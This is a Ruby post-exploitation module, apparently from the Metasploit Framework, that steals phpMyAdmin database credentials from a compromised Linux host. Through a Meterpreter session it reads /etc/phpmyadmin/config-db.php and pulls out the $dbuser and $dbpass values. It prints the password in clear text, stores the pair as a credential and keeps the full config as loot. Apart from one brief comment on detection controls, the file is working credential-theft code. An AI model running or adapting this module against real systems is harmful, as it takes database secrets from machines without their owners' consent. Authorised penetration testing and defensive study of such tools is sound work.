rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/linux/gather/phpmyadmin_credsteal.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Post module for an existing Meterpreter session on a Linux host. It reads
# /etc/phpmyadmin/config-db.php, pulls the $dbuser / $dbpass assignments out
# of it, records the pair through store_valid_credential and keeps a copy of
# the whole file as loot.
#
# Defender's view: the only on-target actions in this file are an existence
# check and a read of that one path, so file-access auditing on
# /etc/phpmyadmin/config-db.php and a restrictive owner/mode on it are the
# controls this module runs into (the read_file failure branch in #run is
# what a permission denial looks like from the module's side).
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged through
  #   update_info with the values declared here
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Phpmyadmin credentials stealer',
        'Description' => %q{
          This module gathers Phpmyadmin creds from target linux machine.
        },
        'License' => MSF_LICENSE,
        'Platform' => ['linux'],
        'SessionTypes' => ['meterpreter'],
        'Author' => [
          'Chaitanya Haritash [bofheaded]',
          'Dhiraj Mishra <[email protected]>'
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
  end

  # Extracts the database user and password from the config text and stores
  # them as a credential.
  #
  # Both patterns use a greedy `.*` and `.` does not cross newlines, so each
  # capture runs from the first quote after `=` to the last quote followed by
  # `;` on that same line.
  #
  # The password is echoed to the operator console in clear text; console
  # output and the credential record both need the handling any recovered
  # secret gets.
  #
  # @param contents [String] text of the config file
  # @return [nil] when either value is missing; otherwise whatever
  #   store_valid_credential returns
  def parse_creds(contents)
    # String#[] with a capture index yields group 1 of the first match, or nil.
    db_user = contents[/\$dbuser\s*=\s*['"](.*)['"];/, 1]
    db_pass = contents[/\$dbpass\s*=\s*['"](.*)['"];/, 1]

    # An empty capture ("") still counts as found; only a missing match bails out.
    if db_user.nil? || db_pass.nil?
      print_error("Couldn't find PhpMyAdmin credentials")
      return
    end

    print_good("User: #{db_user}")
    print_good("Password: #{db_pass}")

    print_status('Storing credentials...')
    store_valid_credential(user: db_user, private: db_pass)
  end

  # Entry point: checks the session platform, reads the config file, hands
  # its text to #parse_creds and then stores the raw file as loot.
  #
  # The loot copy is written whether or not #parse_creds found a credential,
  # so the full config (not just the two values) ends up in the workspace.
  def run
    print_line("\nPhpMyAdmin Creds Stealer!\n")

    on_windows = session.platform.include?('windows')
    if on_windows
      print_error('This module is not compatible with windows')
      return
    end

    conf_path = '/etc/phpmyadmin/config-db.php'
    unless file_exist?(conf_path)
      print_error("#{conf_path} doesn't exist on target")
      return
    end

    print_good('PhpMyAdmin config found!')

    # A falsy result is reported as a likely permission problem.
    config_text = read_file(conf_path)
    unless config_text
      print_error('You may not have permissions to read the file.')
      return
    end

    print_good('Extracting creds')
    parse_creds(config_text)

    loot_path = store_loot(
      'phpmyadmin_conf',
      'text/plain',
      session,
      config_text,
      'phpmyadmin_conf.txt',
      'phpmyadmin_conf'
    )
    print_good("Config file located at #{loot_path}")
  end
end